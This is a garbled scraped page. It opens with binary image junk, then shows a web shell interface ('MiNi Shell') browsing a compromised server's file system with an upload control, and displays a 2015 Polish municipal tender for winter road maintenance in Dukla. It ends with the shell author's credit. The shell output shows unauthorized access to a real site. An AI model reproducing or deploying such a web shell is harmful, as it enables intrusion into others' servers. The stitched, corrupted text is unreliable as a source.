JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20151210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20151210/182087-N-2015.html

<p class="kh_header"><b>Dukla: Zimowe utrzymanie ulic, chodników i kratek kanalizacji deszczowej w obrębie miasta Dukli</b><br>
<b>Numer ogłoszenia: 182087 - 2015; data zamieszczenia: 10.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dukla , ul. Trakt Węgierski 11, 38-450 Dukla, woj. podkarpackie, tel. 013 4329135, faks 013 4331011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dukla.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie ulic, chodników i kratek kanalizacji deszczowej w obrębie miasta Dukli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres prac (tabela nr 3) związanych z zimowym utrzymaniem placów, chodników wykazanych w tabeli Nr 1 na terenie miasta Dukli:
1)	posypywanie piaskiem - natychmiast po wystąpieniu oblodzenia, do godz. 63o
2)	odśnieżanie - przy opadach śnieżnych - codziennie, najpóźniej do godz. 63o w razie   ciągłych opadów na bieżąco,
3)	usuwanie oblodzenia - w miarę potrzeb,
4)	usuwanie zasp śnieżnych zalegających na chodnikach
Tabela nr 1 Wykaz chodników przy ulicach w mieście:
Chodnik przy ulicy	Długość chodnika w metrach	Chodnik przy ulicy	Długoś
chodnika w metrach
wzdłuż ul. Parkowej	928	Wzdłuż ul. Strycharskiego	42
wzdłuż ul. 3 Maja	573	wzdłuż ul. Łąki 	174
wzdłuż ul. Kościuszki	990	wzdłuż ul. Cergowskiej	588
wzdłuż ul. Żwirki i Wigury	736	wzdłuż ul. Mickiewicza	913
wzdłuż ul. Kopernika	355	wzdłuż ul. Trakt Węgierski	3938
Rynek + dojścia	765	wzdłuż ul. Słowackiej	447
wzdłuż ul. Armii Krajowej	522	wzdłuż ul. Jana Pawła II	827
wzdłuż ul. Św. Jana z Dukli	42	wzdłuż ul. Polnej	149
wzdłuż  ul. Podwale	240	wzdłuż ul. Zielonej	122
wzdłuż ul. Pocztowej	663	wzdłuż  ul. Krasickiego	270
2.	Zakres prac (tabela nr 4) związanych z zimowym utrzymaniem ulic wykazanych w Tabeli Nr 2 na terenie miasta Dukli zgodnie z przyjętymi standardami i kolejnością odśnieżania obejmujący:
1)  Wykonanie prac na ulicach w I  kolejności odśnieżania do godz. 63o obejmujący:
a)	 odśnieżanie w sposób umożliwiający swobodny przejazd środkami komunikacyjnymi, 
b)	 posypywanie piaskiem, 
c)	 usuwanie oblodzenia,
d)	 usuwanie zasp śnieżnych zalegających na ulicach,
e)	 wywóz nagromadzonego śniegu w wyznaczone miejsca,
f)	 stałe utrzymywanie drożności kratek na kanalizacji deszczowej, usytuowanych na terenie miasta, 
g)	 oczyszczanie ulic i chodników z pozostałości po piaskowaniu.
Tabela nr 2 Wykaz ulic w mieście i kolejność odśnieżania 
I kolejność odśnieżania	Długość ulicy w metrach	II Kolejność odśnieżania	Długość ulicy w metrach
ul. Kościuszki	545	ul. 3 Maja	293
ul. Łąki 
parking Urzędu Miejskiego	80
858m2	ul. Podwale	166
Rynek + ulice dojazdowe	422	ul. Zielona	104
ul. Pocztowa	1019	ul. Nadbrzeżna	276
ul. Parkowa	464	ul. ks. Antoniego Typrowicza	158
Plac przystanku autobusowego	1080m2	ul. Gen J. Bema	111
ul. J. Słowackiego	338	parkingi przy ulicy Pocztowej	11224m2
ul. I Krasickiego	271		
ul. Jana Pawła	955		
ul. Łukasiewicza	272		
ul. Armii Krajowej wraz z parkingiem	252
3771m2		
ul. Konopnickiej	224		
ul. Św. Jana z Dukli	201		
ul. Słowacka	292		
ul. Polna	365		
parking przy ul. 3-go Maja	1651m2		
ul. Strycharskiego	50		

3.	Zakres prac związanych z zimowym utrzymaniem na terenie miasta Dukli:
1)	placów i chodników.
Tabela nr 3
Lp.	Zakres prac	Ilość godzin pracy
1.	Posypywaniem mechaniczne  piaskiem wraz z materiałem	95
2.	Posypywanie ręczne piaskiem wraz z materiałem	67
3.	Odśnieżanie sprzętem mechanicznym	120
4.	Odśnieżanie ręczne	100
5.	Usuwanie oblodzenia	20
6.	Usuwanie zasp śnieżnych zalegających na chodnikach	35
7.	Odśnieżanie spalinową odśnieżarką	60
8.	Inne prace	40


2)	ulic:
Tabela Nr 4
Lp.	Zakres prac	Ilość godzin pracy
1.	Odśnieżanie sprzętem mechanicznym	130
2.	Odśnieżanie ręczne	20
3.	Posypywanie mechaniczne piaskiem	70
4.	Posypywanie ręczne piaskiem	20
5.	Usuwanie oblodzenia	20
6.	Usuwanie zasp śnieżnych zalegających na ulicach	20
7.	Wywóz nagromadzonego śniegu	20
8.	Stałe utrzymywanie drożności kratek na kanalizacji deszczowej	23
9.	Odśnieżanie spalinową odśnieżarką	25
10.	Inne prace	20.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia w załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia w załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) minimum dwie jednostki do odśnieżania, 
            - jedna jednostka dwunapędowa o mocy od 30 do 100 KM,
           -  druga jednostka dwunapędowa o mocy od 100 do 180 KM.
 Pojazdy muszą być wyposażone w plug lemieszowy z gumową listwą zgarniającą lub   pług wirnikowy.
b)	pojazd silnikowy (wolnobieżny) o min.  mocy 40 KM do usuwania zasp śnieżnych lub załadunku śniegu przeznaczonego do wywozu,
c)	ładowarka lub koparko - ładowarkę o min.  mocy 70 KM do usuwania zasp śnieżnych lub załadunku śniegu przeznaczonego do wywozu,
d)	samochód lub ciągnik rolniczy  z przyczepą o pojemności skrzyni ładunkowej od 4 do 16 m3 do wywozu śniegu,
e)	dwie ręczne odśnieżarki spalinowe z pługiem wirnikowym do ośnieżania chodników o min. mocy 10 KM i szerokości roboczej 75 cm.
Pojazdy mechaniczne silnikowe wymienione w pkt. a), b), c), d) muszą być wyposażone                                      w system GPS.
Przed podpisaniem umowy Wykonawca dostarczy (udostępni) zamawiającemu link oraz login i hasło do systemu monitorowania ww. pojazdów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia w załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia w załącznika Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oferta przetargowa wg Załącznika Nr 1 do SIWZ, 
b)	oświadczenie o spełnieniu warunków  art. 22 ust. 1 i art. 24 ust. 1 Pzp wg Załącznika Nr 2 do SIWZ   - Zał. Nr 1 do oferty,
c)	oświadczenie o podwykonawcach, w przypadku braku podwykonawców w realizacji zadania również oświadczenie o braku podwykonawców (art.36 ust5 Pzp ) wg Załącznika Nr 3 do SIWZ   - Zał. Nr 2  do oferty,
d)	oświadczenie o grupach kapitałowych w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U Nr 50 , poz.331, z późn. zm.) wg Załącznika Nr 4 do SIWZ   - Zał. Nr 3  do oferty,
e)	zaakceptowany i wypełniony przez wykonawcę projekt umowy wg Załącznika Nr 5do SIWZ   - Zał. Nr 4 do oferty,
f)	wykaz urządzeń dostępnych Wykonawcy w celu realizacji zamówienia  wg Załącznika Nr 6 do SIWZ     - Zał. Nr 5 do oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - liczba sprzętu - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	zmiana obowiązującej stawki VAT;
c)	rezygnacja przez zamawiającego z realizacji części przedmiotu umowy ;
d)	zwiększenie zakresu rzeczowego świadczonej usługi,
e)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dukla.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dukli, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2015 godzina 08:00, miejsce: Urząd Miejski w Dukli, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 206.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com